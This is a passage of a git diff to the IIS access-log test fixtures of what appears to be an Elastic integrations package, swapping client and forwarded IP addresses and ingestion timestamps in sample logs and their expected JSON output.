imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504478161.16021944379;+_gat_UA-155746052-5=1;+BIGipServerYAkgvoMHHYQAGkWsadfsdfEWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYaferu1dRyQoUTVVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 15 156.189.143.218 -2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg width=60&height=20&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504748161.16021944379;+_gat_UA-155764052-5=1;+BIGipServerYAkgvoMHHYQAGkWEsadfsdfsWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYu1dRyQoUTVerwerVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 0 156.189.143.218 \ No newline at end of file +2020-10-04 22:00:34 W3SVC2 freca1 10.24.129.162 GET /favicon.ico - 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - https://images.hogeschoolrotterdam.nl/Blob/adeec119008c48758c1a6be53aeeb2ac/34ff475072d54117bcb46ea7f023bd87.jpg?width=1200&height=630&mode=crop images.hogeschoolrotterdam.nl 404 0 2 1437 534 0 67.43.156.14 +2020-10-05 21:40:30 W3SVC2 freca1 10.24.129.162 GET /robots.txt - 80 - 10.24.136.240 HTTP/1.1 Twitterbot/1.0 - - images.hogeschoolrotterdam.nl 200 0 0 346 306 0 67.43.156.14 +2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg width=35&height=38&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMsadfHHYQAGkWEWnyAqAads=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2007 581 15 67.43.156.14 +2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg width=75&height=40&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMHHYQAGkWEWadfsadfnyAqAere=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2926 581 0 67.43.156.14 +2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png width=60&height=20&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504478161.16021944379;+_gat_UA-155746052-5=1;+BIGipServerYAkgvoMHHYQAGkWsadfsdfEWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYaferu1dRyQoUTVVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 15 67.43.156.14 +2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg width=60&height=20&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504748161.16021944379;+_gat_UA-155764052-5=1;+BIGipServerYAkgvoMHHYQAGkWEsadfsdfsWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYu1dRyQoUTVerwerVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 0 67.43.156.14 \ No newline at end of file diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json index 97e129ba912..0dc93bc622f 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json @@ -22,7 +22,7 @@ "preserve_original_event" ], "network": { - "forwarded_ip": "116.189.86.89" + "forwarded_ip": "67.43.156.14" }, "iis": { "access": { @@ -60,8 +60,8 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:32.189721300Z", - "original": "2020-10-04 22:00:34 W3SVC2 freca1 10.24.129.162 GET /favicon.ico - 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - https://images.hogeschoolrotterdam.nl/Blob/adeec119008c48758c1a6be53aeeb2ac/34ff475072d54117bcb46ea7f023bd87.jpg?width=1200\u0026height=630\u0026mode=crop images.hogeschoolrotterdam.nl 404 0 2 1437 534 0 116.189.86.89", + "ingested": "2021-12-09T13:39:35.443415300Z", + "original": "2020-10-04 22:00:34 W3SVC2 freca1 10.24.129.162 GET /favicon.ico - 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - https://images.hogeschoolrotterdam.nl/Blob/adeec119008c48758c1a6be53aeeb2ac/34ff475072d54117bcb46ea7f023bd87.jpg?width=1200\u0026height=630\u0026mode=crop images.hogeschoolrotterdam.nl 404 0 2 1437 534 0 67.43.156.14", "kind": "event", "category": [ "web", @@ -108,7 +108,7 @@ "preserve_original_event" ], "network": { - "forwarded_ip": "119.16.157.180" + "forwarded_ip": "67.43.156.14" }, "iis": { "access": { @@ -145,8 +145,8 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:32.189737700Z", - "original": "2020-10-05 21:40:30 W3SVC2 freca1 10.24.129.162 GET /robots.txt - 80 - 10.24.136.240 HTTP/1.1 Twitterbot/1.0 - - images.hogeschoolrotterdam.nl 200 0 0 346 306 0 119.16.157.180", + "ingested": "2021-12-09T13:39:35.443423700Z", + "original": "2020-10-05 21:40:30 W3SVC2 freca1 10.24.129.162 GET /robots.txt - 80 - 10.24.136.240 HTTP/1.1 Twitterbot/1.0 - - images.hogeschoolrotterdam.nl 200 0 0 346 306 0 67.43.156.14", "kind": "event", "category": [ "web", @@ -189,7 +189,7 @@ "preserve_original_event" ], "network": { - "forwarded_ip": "119.160.162.213" + "forwarded_ip": "67.43.156.14" }, "iis": { "access": { @@ -228,8 +228,8 @@ }, "event": { "duration": 15000000, - "ingested": "2021-06-09T11:14:32.189744300Z", - "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg width=35\u0026height=38\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMsadfHHYQAGkWEWnyAqAads=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2007 581 15 119.160.162.213", + "ingested": "2021-12-09T13:39:35.443429200Z", + "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg width=35\u0026height=38\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMsadfHHYQAGkWEWnyAqAads=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2007 581 15 67.43.156.14", "kind": "event", "category": [ "web", @@ -277,7 +277,7 @@ "preserve_original_event" ], "network": { - "forwarded_ip": "119.160.162.213" + "forwarded_ip": "67.43.156.14" }, "iis": { "access": { @@ -316,8 +316,8 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:32.189749100Z", - "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg width=75\u0026height=40\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMHHYQAGkWEWadfsadfnyAqAere=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2926 581 0 119.160.162.213", + "ingested": "2021-12-09T13:39:35.443434600Z", + "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg width=75\u0026height=40\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMHHYQAGkWEWadfsadfnyAqAere=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2926 581 0 67.43.156.14", "kind": "event", "category": [ "web", @@ -365,7 +365,7 @@ "preserve_original_event" ], "network": { - "forwarded_ip": "156.189.143.218" + "forwarded_ip": "67.43.156.14" }, "iis": { "access": { @@ -404,8 +404,8 @@ }, "event": { "duration": 15000000, - "ingested": "2021-06-09T11:14:32.189753100Z", - "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504478161.16021944379;+_gat_UA-155746052-5=1;+BIGipServerYAkgvoMHHYQAGkWsadfsdfEWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYaferu1dRyQoUTVVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 15 156.189.143.218", + "ingested": "2021-12-09T13:39:35.443440100Z", + "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504478161.16021944379;+_gat_UA-155746052-5=1;+BIGipServerYAkgvoMHHYQAGkWsadfsdfEWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYaferu1dRyQoUTVVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 15 67.43.156.14", "kind": "event", "category": [ "web", @@ -453,7 +453,7 @@ "preserve_original_event" ], "network": { - "forwarded_ip": "156.189.143.218" + "forwarded_ip": "67.43.156.14" }, "iis": { "access": { @@ -492,8 +492,8 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:32.189756900Z", - "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504748161.16021944379;+_gat_UA-155764052-5=1;+BIGipServerYAkgvoMHHYQAGkWEsadfsdfsWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYu1dRyQoUTVerwerVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 0 156.189.143.218", + "ingested": "2021-12-09T13:39:35.443445300Z", + "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504748161.16021944379;+_gat_UA-155764052-5=1;+BIGipServerYAkgvoMHHYQAGkWEsadfsdfsWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYu1dRyQoUTVerwerVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 0 67.43.156.14", "kind": "event", "category": [ "web", diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log index 16bfc26a7e9..9821f6238e2 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log @@ -1,9 +1,9 @@ -2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 26 192.168.198.23 -2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23 -2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 46 192.168.198.23 -2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLAPAprvMaster $filter=BatchId%20eq%20%27FY21HSNG0820%27&$orderby=Subsys,Ref&$skip=0&$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23 -2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLATrnsDetail $filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27&$orderby=RecNo&$skip=0&$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 166 192.168.198.23 -2020-10-07 23:06:42 192.168.16.11 GET /Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 60 192.168.198.23 -2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 72 192.168.198.23 -2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 88 192.168.198.23 -2020-10-07 23:07:02 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/attachDoc - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 286 192.168.198.23 \ No newline at end of file +2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 26 192.168.198.23 +2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23 +2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 46 192.168.198.23 +2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLAPAprvMaster $filter=BatchId%20eq%20%27FY21HSNG0820%27&$orderby=Subsys,Ref&$skip=0&$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23 +2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLATrnsDetail $filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27&$orderby=RecNo&$skip=0&$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 166 192.168.198.23 +2020-10-07 23:06:42 192.168.16.11 GET /Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 60 192.168.198.23 +2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 72 192.168.198.23 +2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 88 192.168.198.23 +2020-10-07 23:07:02 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/attachDoc - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 286 192.168.198.23 \ No newline at end of file diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json index 2787e466725..23aa1ecfdc8 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json @@ -48,8 +48,8 @@ }, "event": { "duration": 26000000, - "ingested": "2021-06-09T11:14:32.323369700Z", - "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 26 192.168.198.23", + "ingested": "2021-12-09T13:39:36.546140500Z", + "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 26 192.168.198.23", "kind": "event", "category": [ "web", @@ -62,7 +62,7 @@ }, "user_agent": { "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36", "os": { "name": "Windows", "version": "10", @@ -71,7 +71,7 @@ "device": { "name": "Other" }, - "version": "85.0.4183.121" + "version": "67.43.156.13" } }, { @@ -122,8 +122,8 @@ }, "event": { "duration": 32000000, - "ingested": "2021-06-09T11:14:32.323391200Z", - "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23", + "ingested": "2021-12-09T13:39:36.546153400Z", + "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23", "kind": "event", "category": [ "web", @@ -136,7 +136,7 @@ }, "user_agent": { "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36", "os": { "name": "Windows", "version": "10", @@ -145,7 +145,7 @@ "device": { "name": "Other" }, - "version": "85.0.4183.121" + "version": "67.43.156.13" } }, { @@ -196,8 +196,8 @@ }, "event": { "duration": 46000000, - "ingested": "2021-06-09T11:14:32.323396700Z", - "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 46 192.168.198.23", + "ingested": "2021-12-09T13:39:36.546173100Z", + "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 46 192.168.198.23", "kind": "event", "category": [ "web", @@ -210,7 +210,7 @@ }, "user_agent": { "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 